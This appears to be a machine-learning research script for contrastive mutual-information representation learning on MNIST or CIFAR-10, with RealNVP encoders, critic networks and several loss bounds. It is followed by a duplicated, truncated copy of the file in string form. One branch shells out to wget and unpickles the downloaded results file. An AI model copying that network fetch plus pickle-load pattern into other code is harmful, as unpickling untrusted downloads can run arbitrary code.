self._layers.append(tfkl.Dense(layer_dimensions[-1], **dense_kwargs_copy))
self._shortcuts = shortcuts
@property
def layers(self):
return self._layers
def __call__(self, inputs):
x = inputs
for layer in self.layers:
x = layer(x) + x if self._shortcuts else layer(x)
return x
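# Usage sketch for the MLP building block (ours; never invoked): a two-layer MLP mapping
# 10-d inputs to 4-d outputs. shortcuts=True only makes sense when layer widths match the
# input width, so it is disabled here; the dimensions are arbitrary.
def _demo_mlp():
    mlp = MLP([32, 4], shortcuts=False, dense_kwargs={"activation": "relu"})
    print(mlp(tf.random.normal([3, 10])).shape)  # expected: (3, 4)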
# LayerNorm implementation copied from
# https://stackoverflow.com/questions/39095252/fail-to-implement-layer-normalization-with-keras
class LayerNorm(tfkl.Layer):
""" Layer Normalization in the style of https://arxiv.org/abs/1607.06450 """
def __init__(self, scale_initializer='ones', bias_initializer='zeros',
axes=[1,2,3], epsilon=1e-6, **kwargs):
super(LayerNorm, self).__init__(**kwargs)
self.epsilon = epsilon
self.scale_initializer = tf.keras.initializers.get(scale_initializer)
self.bias_initializer = tf.keras.initializers.get(bias_initializer)
self.axes = axes
def build(self, input_shape):
self.scale = self.add_weight(shape=(input_shape[-1],),
initializer=self.scale_initializer,
trainable=True,
name='{}_scale'.format(self.name))
self.bias = self.add_weight(shape=(input_shape[-1],),
initializer=self.bias_initializer,
trainable=True,
name='{}_bias'.format(self.name))
self.built = True
def call(self, x, mask=None):
mean = tf.keras.backend.mean(x, axis=self.axes, keepdims=True)
std = tf.keras.backend.std(x, axis=self.axes, keepdims=True)
norm = (x - mean) * (1/(std + self.epsilon))
return norm * self.scale + self.bias
def compute_output_shape(self, input_shape):
return input_shape
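# Illustrative sketch (ours; never invoked): with the default axes=[1, 2, 3], LayerNorm
# expects rank-4 feature maps such as the conv activations inside ConvNet below.
def _demo_layer_norm():
    feature_map = tf.random.normal([2, 14, 28, 8])
    print(LayerNorm()(feature_map).shape)  # expected: (2, 14, 28, 8)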
class ConvNet(tf.keras.Sequential):
def __init__(self, channels=64, kernel_size=5, input_dim=DIMS//2, output_dim=100,
activation=tf.nn.relu):
# Note: This works only for the specific data set considered here.
super(ConvNet, self).__init__([
tfkl.Reshape((14, 28, 1), input_shape=(input_dim,)),
tfkl.Conv2D(channels, kernel_size, strides=2,
padding="same", activation=activation),
tfkl.Conv2D(2*channels, kernel_size, strides=2,
padding="same", activation=activation),
LayerNorm(),
tfkl.GlobalAveragePooling2D(),
tfkl.Dense(output_dim),
])
from tensorflow_probability.python.internal import tensorshape_util
import tensorflow.compat.v1 as tf1
from tensorflow_probability.python.bijectors import affine_scalar
from tensorflow_probability.python.bijectors import bijector as bijector_lib
# Modified from tensorflow_probability/python/bijectors/real_nvp.py
class RealNVP(bijector_lib.Bijector):
def __init__(self,
num_masked,
shift_and_log_scale_fn=None,
bijector_fn=None,
is_constant_jacobian=False,
validate_args=False,
name=None):
name = name or 'real_nvp'
if num_masked < 0:
raise ValueError('num_masked must be a non-negative integer.')
self._num_masked = num_masked
# At construction time, we don't know input_depth.
self._input_depth = None
if bool(shift_and_log_scale_fn) == bool(bijector_fn):
raise ValueError('Exactly one of `shift_and_log_scale_fn` and '
'`bijector_fn` should be specified.')
if shift_and_log_scale_fn:
def _bijector_fn(x0, input_depth, **condition_kwargs):
shift, log_scale = shift_and_log_scale_fn(x0, input_depth,
**condition_kwargs)
# ** First modification is here.
return affine_scalar.AffineScalar(shift=shift, scale=log_scale)
bijector_fn = _bijector_fn
if validate_args:
bijector_fn = _validate_bijector_fn(bijector_fn)
# Still do this assignment for variable tracking.
self._shift_and_log_scale_fn = shift_and_log_scale_fn
self._bijector_fn = bijector_fn
super(RealNVP, self).__init__(
forward_min_event_ndims=1,
is_constant_jacobian=is_constant_jacobian,
validate_args=validate_args,
name=name)
def _cache_input_depth(self, x):
if self._input_depth is None:
self._input_depth = tf.compat.dimension_value(
tensorshape_util.with_rank_at_least(x.shape, 1)[-1])
if self._input_depth is None:
raise NotImplementedError(
'Rightmost dimension must be known prior to graph execution.')
if self._num_masked >= self._input_depth:
raise ValueError(
'Number of masked units must be smaller than the event size.')
def _forward(self, x, **condition_kwargs):
self._cache_input_depth(x)
x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]
y1 = self._bijector_fn(x0, self._input_depth - self._num_masked,
**condition_kwargs).forward(x1)
y = tf.concat([x0, y1], axis=-1)
return y
def _inverse(self, y, **condition_kwargs):
self._cache_input_depth(y)
y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]
x1 = self._bijector_fn(y0, self._input_depth - self._num_masked,
**condition_kwargs).inverse(y1)
x = tf.concat([y0, x1], axis=-1)
return x
def _forward_log_det_jacobian(self, x, **condition_kwargs):
self._cache_input_depth(x)
x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]
return self._bijector_fn(x0, self._input_depth - self._num_masked,
**condition_kwargs).forward_log_det_jacobian(
x1, event_ndims=1)
def _inverse_log_det_jacobian(self, y, **condition_kwargs):
self._cache_input_depth(y)
y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]
return self._bijector_fn(y0, self._input_depth - self._num_masked,
**condition_kwargs).inverse_log_det_jacobian(
y1, event_ndims=1)
def real_nvp_default_template(hidden_layers,
shift_only=False,
activation=tf.nn.relu,
name=None,
*args, # pylint: disable=keyword-arg-before-vararg
**kwargs):
with tf.compat.v1.name_scope(name or 'real_nvp_default_template'):
def _fn(x, output_units, **condition_kwargs):
"""Fully connected MLP parameterized via `real_nvp_template`."""
if condition_kwargs:
raise NotImplementedError(
'Conditioning not implemented in the default template.')
if tensorshape_util.rank(x.shape) == 1:
x = x[tf.newaxis, ...]
reshape_output = lambda x: x[0]
else:
reshape_output = lambda x: x
for units in hidden_layers:
x = tf1.layers.dense(
inputs=x,
units=units,
activation=activation,
*args, # pylint: disable=keyword-arg-before-vararg
**kwargs)
x = tf1.layers.dense(
inputs=x,
units=(1 if shift_only else 2) * output_units,
activation=None,
*args, # pylint: disable=keyword-arg-before-vararg
**kwargs)
if shift_only:
return reshape_output(x), None
shift, log_scale = tf.split(x, 2, axis=-1)
# ** Here is the second modification.
return reshape_output(shift), 1e-7 + tf.nn.softplus(reshape_output(log_scale))
return tf1.make_template('real_nvp_default_template', _fn)
class RealNVPBijector(tf.keras.Model):
def __init__(self, dimensions, n_couplings, hidden_layers, dense_kwargs):
super(RealNVPBijector, self).__init__()
permutations = [np.random.permutation(dimensions)
for _ in range(n_couplings)]
bijectors = []
for permutation in permutations:
bijectors.append(RealNVP(
dimensions // 2,
real_nvp_default_template(hidden_layers, **dense_kwargs)))
bijectors.append(tfb.Permute(permutation))
self._bijector = tfb.Chain(bijectors)
def call(self, inputs):
return self._bijector.forward(inputs)
class InnerProdCritic(tf.keras.Model):
def call(self, x, y):
return tf.matmul(x, y, transpose_b=True)
class BilinearCritic(tf.keras.Model):
def __init__(self, feature_dim=100, **kwargs):
super(BilinearCritic, self).__init__(**kwargs)
self._W = tfkl.Dense(feature_dim, use_bias=False)
def call(self, x, y):
return tf.matmul(x, self._W(y), transpose_b=True)
# https://colab.research.google.com/github/google-research/google-research/blob/master/vbmi/vbmi_demo.ipynb
class ConcatCritic(tf.keras.Model):
def __init__(self, hidden_dim=200, layers=1, activation='relu', **kwargs):
super(ConcatCritic, self).__init__(**kwargs)
# output is scalar score
self._f = MLP([hidden_dim for _ in range(layers)]+[1], False, {"activation": "relu"})
def call(self, x, y):
batch_size = tf.shape(input=x)[0]
# Tile all possible combinations of x and y
x_tiled = tf.tile(x[None, :], (batch_size, 1, 1))
y_tiled = tf.tile(y[:, None], (1, batch_size, 1))
# xy is [batch_size * batch_size, x_dim + y_dim]
xy_pairs = tf.reshape(tf.concat((x_tiled, y_tiled), axis=2),
[batch_size * batch_size, -1])
# Compute scores for each x_i, y_j pair.
scores = self._f(xy_pairs)
return tf.transpose(a=tf.reshape(scores, [batch_size, batch_size]))
class SeparableCritic(tf.keras.Model):
def __init__(self, hidden_dim=100, output_dim=100, layers=1,
activation='relu', **kwargs):
super(SeparableCritic, self).__init__(**kwargs)
self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim], False, {"activation": activation})
self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim], False, {"activation": activation})
def call(self, x, y):
x_mapped = self._f_x(x)
y_mapped = self._f_y(y)
return tf.matmul(x_mapped, y_mapped, transpose_b=True)
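# Shape sketch for the critics (ours; never invoked): every critic maps two batches of codes,
# each [batch, feature_dim], to a [batch, batch] score matrix whose diagonal holds the scores
# of the positive (paired) examples; that matrix is what the bounds above consume.
def _demo_critic_scores(batch_size=8, feature_dim=16):
    x = tf.random.normal([batch_size, feature_dim])
    y = tf.random.normal([batch_size, feature_dim])
    scores = BilinearCritic(feature_dim=feature_dim)(x, y)
    print(scores.shape, float(infonce_lower_bound(scores)))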
def train(g1,
g2,
critic,
loss_fn,
learning_rate,
batch_size=TRAIN_BATCH_SIZE,
n_iters=15000,
n_evals=15,
compute_jacobian=False,
noise_std=0.0,
data_dimensions=DIMS//2,
n_iter=1,
loss_name='InfoNCE',
):
"""Runs the training loop for a fixed model.
Args:
g1: Function, maps input1 to representation.
g2: Function, maps input2 to representation.
critic: Function, maps two representations to scalar.
loss_fn: Function, mutual information estimator.
learning_rate: Learning rate.
batch_size: Training batch size.
n_iters: Number of optimization iterations.
n_evals: Number of model evaluations.
compute_jacobian: Whether to estimate the singular values of the Jacobian.
noise_std: Standard deviation for the Gaussian noise. Default is 0.0.
data_dimensions: The dimension of the data. By default it's half of the
original data dimension.
Returns:
Returns and instance of `Results` tuple.
"""
x_1, x_2, _ = processed_train_data(data_dimensions, batch_size)
if noise_std > 0.0:
assert x_1.shape == x_2.shape, "X1 and X2 shapes must agree to add noise!"
noise = noise_std * tf.random.normal(x_1.shape)
x_1 += noise
x_2 += noise
# Compute the representations.
code_1, code_2 = g1(x_1), g2(x_2)
critic_matrix = critic(code_1, code_2)
# Compute the Jacobian of g1 if needed.
if compute_jacobian:
jacobian = gradients.batch_jacobian(code_1, x_1, use_pfor=False)
singular_values = tf.linalg.svd(jacobian, compute_uv=False)
# Optimizer setup.
loss = loss_fn(critic_matrix)
optimizer = tf.compat.v1.train.AdamOptimizer(learning_rate=learning_rate)
if not loss_name == 'wpc':
optimizer_op = optimizer.minimize(loss)
else:
gvs = optimizer.compute_gradients(loss)
capped_gvs = [(tf.clip_by_value(grad, -1., 1.), var) for grad, var in gvs]
optimizer_op = optimizer.apply_gradients(capped_gvs)
with tf.compat.v1.Session() as session:
session.run(tf.compat.v1.global_variables_initializer())
# Subgraph for eval (add noise to input if necessary)
data_ph = tf.compat.v1.placeholder(tf.float32, shape=[None, data_dimensions])
data_ph_noisy = data_ph + noise_std * tf.random.normal(tf.shape(input=data_ph))
codes = g1(data_ph_noisy)
training_losses, testing_losses, classification_accuracies, iters, sigmas \
= [], [], [], [], []
# Main training loop.
for iter_n in range(n_iters):
# Evaluate the model performance.
if iter_n % (n_iters // n_evals) == 0:
iters.append(iter_n)
accuracy = get_classification_accuracy(session, codes, data_ph, data_dimensions)
classification_accuracies.append(accuracy)
testing_losses.append(
get_testing_loss(x_test, session, loss, data_ph, data_dimensions))
if compute_jacobian:
sigmas.append(session.run(singular_values))
print("{:d}th iter Loss_name {} Step {:>10d} fit {:>.5f} DS {} B {:d} lr {:f}".format(\
n_iter, loss_name, iter_n, accuracy, args.dataset, args.batch_size, args.lr))
# Run one optimization step.
loss_np, _ = session.run([loss, optimizer_op])
training_losses.append(loss_np)
return Results(iterations=iters,
training_losses=training_losses,
testing_losses=testing_losses,
classification_accuracies=classification_accuracies,
singular_values=sigmas)
def run_sweep(nets, critics, loss_fns, exp_name, **kwargs):
"""Runs the sweep across encoder networks, critics, and the estimators."""
grid = itertools.product(nets, critics, loss_fns)
data_frames = []
results_with_singular_values = []
for nets_name, critic_name, loss_name in grid:
print("[New experiment] encoder: {}, critic: {}, loss: {}".format(
nets_name, critic_name, loss_name))
with tf.Graph().as_default():
g1, g2 = nets[nets_name]()
critic = critics[critic_name]()
loss_fn = loss_fns[loss_name]
results_per_run = []
for n in range(NRUNS):
try:
print("{:d}th run, loss: {}".format(n, loss_name))
if loss_name == "drfc" and TFDS_NAME == "cifar10":
results = train(g1, g2, critic, loss_fn, **kwargs, learning_rate=LEARNING_RATE, n_iter=n, loss_name=loss_name)
#results = train(g1, g2, critic, loss_fn, **kwargs, learning_rate=1e-4, n_iter=n, loss_name=loss_name)
else:
results = train(g1, g2, critic, loss_fn, **kwargs, learning_rate=LEARNING_RATE, n_iter=n, loss_name=loss_name)
results_per_run.append(results)
except Exception as ex:
print("Run {} failed! Error: {}".format(n, ex))
for i, result in enumerate(results_per_run):
data_frames.append(convert_to_data_frame(
result, exp_name, nets_name, critic_name, loss_name, i))
if kwargs.get('compute_jacobian', False):
results_with_singular_values.append((
ResultsConfig(nets_name, critic_name, loss_name), results_per_run
))
return {
"df": pd.concat(data_frames),
"singular_values": results_with_singular_values
}
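# Post-hoc analysis sketch (ours; not executed here): the data frame returned by run_sweep
# (and pickled to RESULT_DIR) can be summarized with the pandas/seaborn imports already
# present; column names follow convert_to_data_frame above. The helper name and output
# file name are ours.
def _plot_accuracy_curves(df, out_path="accuracy_curves.png"):
    fig, ax = plt.subplots(figsize=(6, 4))
    sns.lineplot(data=df, x="iteration", y="accuracy", hue="Estimator", ax=ax)
    apply_default_style(ax)
    fig.savefig(out_path, bbox_inches="tight")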
#@title Run experiment or load precomputed results { display-mode: "form" }
def run_all_experiments():
tf.compat.v1.reset_default_graph()
wpc_loss = lambda x: -infonce_lower_bound(x)
cpc_loss = lambda x: -infonce_lower_bound(x)
#nwj_loss = lambda x: -nwj_lower_bound(x)
drfc_loss = lambda x: -our_lower_bound(x)
pcc_loss = lambda x: -js_fgan_lower_bound(x)
skew_pcc_loss = lambda x: -skew_js_fgan_lower_bound(x)
ls_pcc_loss = lambda x: -label_smooth_pcc(x)
pre_ls_pcc_loss = lambda x: -predict_smooth_pcc(x)
adap_pred_smooth_pcc_loss = lambda x: -adap_pred_smooth_pcc(x)
adap_label_smooth_pcc_loss = lambda x: -adap_label_smooth_pcc(x)
loss_fcts = {
# "wpc": wpc_loss,
"pcc": pcc_loss,
# "drfc": drfc_loss,
#"nwj": nwj_loss,
"cpc": cpc_loss,
# "skew_pcc": skew_pcc_loss,
"ls_pcc": ls_pcc_loss,
"prels_pcc": pre_ls_pcc_loss,
"adap_pred_pcc": adap_pred_smooth_pcc_loss,
"adap_label_pcc": adap_label_smooth_pcc_loss
}
kwargs = dict(
shift_only=True,
activation=lambda x: tf.nn.relu(x),
kernel_initializer=tf.compat.v1.initializers.truncated_normal(stddev=0.0001),
bias_initializer='zeros')
nets = {
"realnvp": lambda: (
RealNVPBijector(DIMS // 2, n_couplings=30, hidden_layers=[512, 512], dense_kwargs=kwargs),
RealNVPBijector(DIMS // 2, n_couplings=30, hidden_layers=[512, 512], dense_kwargs=kwargs)
)
}
critics = {
"bilinear": lambda: BilinearCritic(feature_dim=DIMS//2),
}
return run_sweep(nets, critics, loss_fcts, "invertible", n_iters=21000, n_evals=21)
if RUN_EXPERIMENTS:
data_invertible = run_all_experiments()["df"]
data_invertible.to_pickle(RESULT_DIR)
else:
os.system("wget -q -N https://storage.googleapis.com/mi_for_rl_files/mi_results.pkl")
data_invertible = pd.read_pickle('mi_results.pkl')
data_invertible = data_invertible[data_invertible.exp_name == "invertible"]
| [
"# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# https://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n# reference links:\n# From https://colab.research.google.com/github/google-research/google-research/blob/master/vbmi/vbmi_demo.ipynb\n# https://github.com/google-research/google-research/blob/master/mutual_information_representation_learning/mirl.ipynb\n# https://github.com/yaohungt/Pointwise_Dependency_Neural_Estimation/tree/master/RepreLearn_Shallow\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport collections\nimport copy\nimport functools\nimport itertools\nimport os\nimport pickle\nimport argparse\nfrom matplotlib import pyplot as plt\nfrom matplotlib.ticker import FuncFormatter\nimport numpy as np\nimport pandas as pd\nfrom scipy.ndimage import gaussian_filter1d\nimport seaborn as sns\nimport tensorflow as tf\nfrom tensorflow.python.ops.parallel_for import gradients\nimport tensorflow_datasets as tfds\nimport tensorflow_probability as tfp\nimport sklearn.linear_model as sk_linear\n\nparser = argparse.ArgumentParser(description='Representation Learning Experiments')\nparser.add_argument('--dataset', default='mnist', type=str, \n help='cifar10 or mnist')\nparser.add_argument('--lr', default=1e-4, type=float, \n help='learning rate')\nparser.add_argument('--batch_size', default=100, type=int, \n help='mini batch size')\nparser.add_argument('--smoothing', default=0.01, type=float,\n help='label smoothing parameter')\nparser.add_argument('--output_dir', type=str, default='./runs',\n help='directory where the results will be stored')\n\nargs = parser.parse_args()\na, b, c = 0.005, 0.1, 0.9\nif not os.path.isdir(args.output_dir):\n os.mkdir(args.output_dir)\n# learning rate for ours CIFAR10 is 1e-4, otherwise follows below\n\nTFDS_NAME = args.dataset #\"cifar10\" # mnist or cifar10\nNRUNS = 10 #@param { type: \"slider\", min: 1, max: 20, step: 1}\n\n# parameters for training\nif TFDS_NAME == \"mnist\":\n DIMS = 784\nelif TFDS_NAME == \"cifar10\":\n DIMS = 3072\nLEARNING_RATE = args.lr #1e-5\nN_CLASSES = 10\nTRAIN_BATCH_SIZE = args.batch_size #64 #@param { type: \"slider\", min: 64, max: 128, step: 64}\n\n# save results\n# RESULT_DIR = '{}_nrun={}_lr={}_batch={}.pkl'.format(TFDS_NAME, NRUNS, LEARNING_RATE, TRAIN_BATCH_SIZE)\nRESULT_DIR = './runs/{}_nrun={}_lr={}_batch={}.pkl'.format(TFDS_NAME, NRUNS, LEARNING_RATE, TRAIN_BATCH_SIZE)\n\nRUN_EXPERIMENTS = True\nFEATURE_INPUT = \"image\"\nFEATURE_LABEL = \"label\"\n\n#slim = tf.contrib.slim\ntfb = tfp.bijectors\ntfd = tfp.distributions\ntfkl = tf.keras.layers\n\ntf.keras.backend.clear_session()\n\nResultsConfig = collections.namedtuple(\n \"ResultsConfig\", [\"nets\", \"critic\", \"loss\"])\n\nResults = collections.namedtuple(\n 'Results',\n ['iterations', 'training_losses', 'testing_losses',\n 'classification_accuracies', 'singular_values'])\n\nResultsAdversarial = collections.namedtuple(\n \"ResultsAdversarial\",\n [\"losses_e\", \"losses_c\", \"classification_accuracies\", \"iters\"]\n)\n\nResultsSamplingIssues = collections.namedtuple(\n 
\"ResultsSamplingIssues\", [\"mi_true\", \"nce_estimates_noniid\", \n \"nce_estimates_iid\", \"nwj_estimates_noniid\", \n \"nwj_estimates_iid\"])\n\ndef acti_func(x, a, b, c):\n # y: a\n # x: 0 b c 1\n x = tf.stop_gradient(x)\n alpha = tf.zeros_like(x)\n alpha = tf.where(x<=b, -a*x/b+a, alpha)\n alpha = tf.where((x>b) & (x<c), 0., alpha)\n alpha = tf.where(x>=c, a*x/(1-c)+a*c/(c-1), alpha)\n return alpha\n\ndef convert_to_data_frame(result, exp_name, nets, critic, loss, seed):\n \"\"\"Convert results class to a data frame.\"\"\"\n label = \"{}, {}, {}\".format(nets, critic, loss)\n rows = list(\n zip(\n itertools.repeat(exp_name),\n itertools.repeat(nets),\n itertools.repeat(critic),\n itertools.repeat(loss),\n itertools.repeat(seed),\n result.iterations,\n [-loss for loss in result.testing_losses], # Loss -> bound.\n result.classification_accuracies,\n itertools.repeat(label)))\n df_eval = pd.DataFrame(\n rows,\n columns=(\"exp_name\", \"nets\", \"Critic\", \"Estimator\",\n \"run\", \"iteration\", \"bound_value\", \"accuracy\", \"label\"))\n\n df_eval[\"Estimator\"] = df_eval[\"Estimator\"].replace(\n to_replace={\n \"cpc\": \"$CPC$\",\n \"pcc\": \"$PCC$\",\n \"drfc\": \"$D-RFC$\",\n \"wpc\": \"$WPC$\"\n })\n df_eval[\"Critic\"] = df_eval[\"Critic\"].replace(\n to_replace={\n \"concat\": \"MLP\",\n \"separable\": \"Separable\",\n \"innerprod\": \"Inner product\",\n \"bilinear\": \"Bilinear\"\n })\n return df_eval\n\n\ndef apply_default_style(ax):\n ax.set_xlim([0, 20001])\n ax.get_xaxis().set_major_formatter(\n FuncFormatter(lambda x, p: format(int(x/1000), ',')))\n ax.set_xlabel(\"Training steps (in thousands)\")\n plt.tick_params(top=False, right=False, bottom=False, left=False)\n handles, labels = ax.get_legend_handles_labels()\n plt.legend(loc=\"lower right\", handles=handles[1:], labels=labels[1:])\n\ndef get_testing_loss(x_array, session, loss, data_ph, dims, batch_size=512):\n total_loss = 0\n for i in range(0, x_array.shape[0], batch_size):\n x_slice = x_array[i:i+batch_size, :dims]\n total_loss += x_slice.shape[0] * session.run(loss,\n feed_dict={data_ph: x_slice})\n return total_loss / x_array.shape[0]\n\ndef get_classification_accuracy(session, codes, data_ph, dims):\n x_train_mapped = map_data(x_train, session, codes, data_ph, dims)\n x_test_mapped = map_data(x_test, session, codes, data_ph, dims)\n accuracy = logistic_fit(x_train_mapped, y_train, x_test_mapped, y_test)\n return accuracy\n\ndef map_data(x_array, session, codes, data_ph, dims, batch_size=512):\n x_mapped = []\n for i in range(0, x_array.shape[0], batch_size):\n x_mapped.append(\n session.run(codes,\n feed_dict={data_ph: x_array[i:i+batch_size, :dims]}))\n return np.concatenate(x_mapped, axis=0)\n\ndef reduce_logmeanexp_nodiag(x, axis=None):\n batch_size = x.shape[0]\n logsumexp = tf.reduce_logsumexp(input_tensor=x - tf.linalg.tensor_diag(np.inf * tf.ones(batch_size)), axis=axis)\n if axis:\n num_elem = batch_size - 1.\n else:\n num_elem = batch_size * (batch_size - 1.)\n return logsumexp - tf.math.log(num_elem)\n\ndef tuba_lower_bound(scores, log_baseline=None):\n if log_baseline is not None:\n scores -= log_baseline[:, None]\n batch_size = tf.cast(scores.shape[0], tf.float32)\n # First term is an expectation over samples from the joint,\n # which are the diagonal elmements of the scores matrix.\n joint_term = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores))\n # Second term is an expectation over samples from the marginal,\n # which are the off-diagonal elements of the scores matrix.\n marg_term = 
tf.exp(reduce_logmeanexp_nodiag(scores))\n return 1. + joint_term - marg_term\n\ndef nwj_lower_bound(scores):\n # equivalent to: tuba_lower_bound(scores, log_baseline=1.)\n return tuba_lower_bound(scores - 1.) \n\[email protected]\ndef js_fgan_lower_bound(f):\n \"\"\"Lower bound on Jensen-Shannon divergence from Nowozin et al. (2016).\"\"\"\n f_diag = tf.linalg.tensor_diag_part(f)\n first_term = tf.reduce_mean(-tf.nn.softplus(-f_diag))\n n = tf.cast(f.shape[0], tf.float32)\n second_term = (tf.reduce_sum(tf.nn.softplus(f)) - tf.reduce_sum(tf.nn.softplus(f_diag))) / (n * (n - 1.))\n return first_term - second_term\n\[email protected]\ndef infonce_lower_bound(scores):\n \"\"\"InfoNCE lower bound from van den Oord et al. (2018).\"\"\"\n nll = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores) - tf.reduce_logsumexp(input_tensor=scores, axis=1))\n mi = tf.math.log(tf.cast(scores.shape[0], tf.float32)) + nll\n return mi\n\[email protected]\ndef our_lower_bound(scores):\n # scores: 128, 128\n \"\"\"Our lower bound\"\"\"\n batch_size = tf.cast(scores.shape[0], tf.float32)\n joint_term = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores))\n\n # expectation\n scores_sq = scores**2\n marg_num = batch_size * (batch_size - 1.)\n marg_term = tf.reduce_sum(input_tensor=scores_sq) - tf.reduce_sum(input_tensor=tf.linalg.diag_part(scores_sq))\n marg_term = marg_term / marg_num\n # tf.print(joint_term - 0.5*marg_term)\n return joint_term - 0.5*marg_term\n\n\n # nll = tf.reduce_mean(tf.linalg.diag_part(scores) - 0.5 * tf.math.reduce_euclidean_norm(scores, axis=1))\n # tf.print(nll)\n # mi = tf.math.log(tf.cast(scores.shape[0].value, tf.float32)) + nll\n # return mi\n\[email protected]\ndef skew_js_fgan_lower_bound(f):\n \"\"\"skewed js lower bound (true cross entropy)\"\"\"\n n = tf.cast(f.shape[0], tf.float32)\n alpha = 1/n\n f_diag = tf.linalg.tensor_diag_part(f)\n first_term = tf.reduce_mean(-tf.nn.softplus(-f_diag))\n second_term = (tf.reduce_sum(tf.nn.softplus(f)) - tf.reduce_sum(tf.nn.softplus(f_diag))) / (n * (n - 1.))\n return alpha*first_term - (1-alpha)*second_term\n\[email protected]\ndef label_smooth_pcc(f):\n \"\"\" pcc with label smoothing trick\"\"\"\n n = f.shape[0]\n labels = tf.eye(n)\n labels = tf.reshape(labels,[-1,1])\n labels = (1.0 - args.smoothing) * labels + args.smoothing / 2\n pre_prob = tf.reshape(tf.sigmoid(f), [-1,1])\n bce = tf.keras.losses.BinaryCrossentropy()\n return -bce(labels, pre_prob)\n\[email protected]\ndef predict_smooth_pcc(f):\n \"\"\" pcc with predictor smoothing trick\"\"\"\n n = f.shape[0]\n labels = tf.eye(n)\n labels = tf.reshape(labels,[-1,1])\n # labels = (1.0 - args.smoothing) * labels + args.smoothing / 2\n pre_prob = tf.reshape(tf.sigmoid(f), [-1,1])\n pre_prob = (1.0 - args.smoothing) * pre_prob + args.smoothing / 2\n bce = tf.keras.losses.BinaryCrossentropy()\n return -bce(labels, pre_prob)\n\[email protected]\ndef adap_label_smooth_pcc(f):\n n = f.shape[0]\n labels = tf.eye(n)\n labels = tf.reshape(labels,[-1,1])\n # labels = (1.0 - args.smoothing) * labels + args.smoothing / 2\n pre_prob = tf.reshape(tf.sigmoid(f), [-1,1])\n alpha = acti_func(pre_prob, a, b, c)\n new_labels = (1.0 - alpha) * labels + alpha / 2\n bce = tf.keras.losses.BinaryCrossentropy()\n return -bce(new_labels, pre_prob)\n\[email protected]\ndef adap_pred_smooth_pcc(f):\n n = f.shape[0]\n labels = tf.eye(n)\n labels = tf.reshape(labels,[-1,1])\n # labels = (1.0 - args.smoothing) * labels + args.smoothing / 2\n pre_prob = tf.reshape(tf.sigmoid(f), [-1,1])\n # 
print('pre_prob:',pre_prob)\n alpha = acti_func(pre_prob, a, b, c)\n pre_prob = (1.0 - alpha) * pre_prob + alpha / 2\n bce = tf.keras.losses.BinaryCrossentropy()\n return -bce(labels, pre_prob)\n\n# @title Define the linear evaluation protocol { display-mode: \"form\" }\n\ndef logistic_fit(x_train, y_train, x_test, y_test):\n logistic_regressor = sk_linear.LogisticRegression(\n solver='saga', multi_class='multinomial', tol=.1, C=10.)\n from sklearn.preprocessing import MinMaxScaler\n scaler = MinMaxScaler()\n x_train = scaler.fit_transform(x_train)\n x_test = scaler.transform(x_test)\n logistic_regressor.fit(x_train, y_train.ravel())\n return logistic_regressor.score(x_test, y_test.ravel())\n\n# @title Define and load the dataset, check baseline in pixel space { display-mode: \"form\" }\n\ntf.compat.v1.reset_default_graph()\n\n\ndef map_fn(example):\n image = example[FEATURE_INPUT]\n image = tf.cast(image, tf.float32) / 255.0\n image = tf.reshape(image, [-1]) # Flatten.\n label = example[FEATURE_LABEL]\n return {FEATURE_INPUT: image, FEATURE_LABEL: label}\n\ndef load_data(split):\n return (tfds.load(TFDS_NAME, data_dir='/public/wangxu/data/', split=split)\n .cache()\n .map(map_func=map_fn)\n .shuffle(1000))\n\ndef tfds_to_np(dataset):\n features = list(tfds.as_numpy(dataset))\n images = np.stack([f[FEATURE_INPUT].ravel() for f in features])\n labels = np.stack([f[FEATURE_LABEL].ravel() for f in features])\n return images, labels\n\ndataset_train = load_data(\"train\")\ndataset_test = load_data(\"test\")\nx_train, y_train = tfds_to_np(dataset_train)\nx_test, y_test = tfds_to_np(dataset_test)\ntf.compat.v1.reset_default_graph()\n\nx_train_noisy = x_train + 0.05 * np.random.randn(*x_train.shape)\nx_test_noisy = x_test + 0.05 * np.random.randn(*x_test.shape)\nprint(\"Fit on half the pixels: {}. 
It should be around 0.835.\".format(\n logistic_fit(x_train_noisy[:, :DIMS//2], y_train,\n x_test_noisy[:, :DIMS//2], y_test)))\n\ndef processed_train_data(dims, batch_size):\n dataset = load_data(\"train\")\n dataset_batched = dataset.repeat().batch(batch_size, drop_remainder=True)\n get_next = tf.compat.v1.data.make_one_shot_iterator(dataset_batched).get_next()\n features = get_next[FEATURE_INPUT]\n labels = get_next[FEATURE_LABEL]\n # Martin: where the problem occurs\n x_1, x_2 = tf.split(features, [dims, DIMS-dims], axis=-1)\n return x_1, x_2, labels\n\nclass MLP(tf.keras.Model):\n def __init__(self, layer_dimensions, shortcuts, dense_kwargs={}):\n super(MLP, self).__init__()\n self._layers = [tfkl.Dense(dimensions, **dense_kwargs)\n for dimensions in layer_dimensions[:-1]]\n dense_kwargs_copy = copy.deepcopy(dense_kwargs)\n dense_kwargs_copy[\"activation\"] = None\n self._layers.append(tfkl.Dense(layer_dimensions[-1], **dense_kwargs_copy))\n self._shortcuts = shortcuts\n\n @property\n def layers(self):\n return self._layers\n\n def __call__(self, inputs):\n x = inputs\n for layer in self.layers:\n x = layer(x) + x if self._shortcuts else layer(x)\n return x\n\n\n# LayerNorm implementation copied from\n# https://stackoverflow.com/questions/39095252/fail-to-implement-layer-normalization-with-keras\nclass LayerNorm(tfkl.Layer):\n\n \"\"\" Layer Normalization in the style of https://arxiv.org/abs/1607.06450 \"\"\"\n def __init__(self, scale_initializer='ones', bias_initializer='zeros',\n axes=[1,2,3], epsilon=1e-6, **kwargs):\n super(LayerNorm, self).__init__(**kwargs)\n self.epsilon = epsilon\n self.scale_initializer = 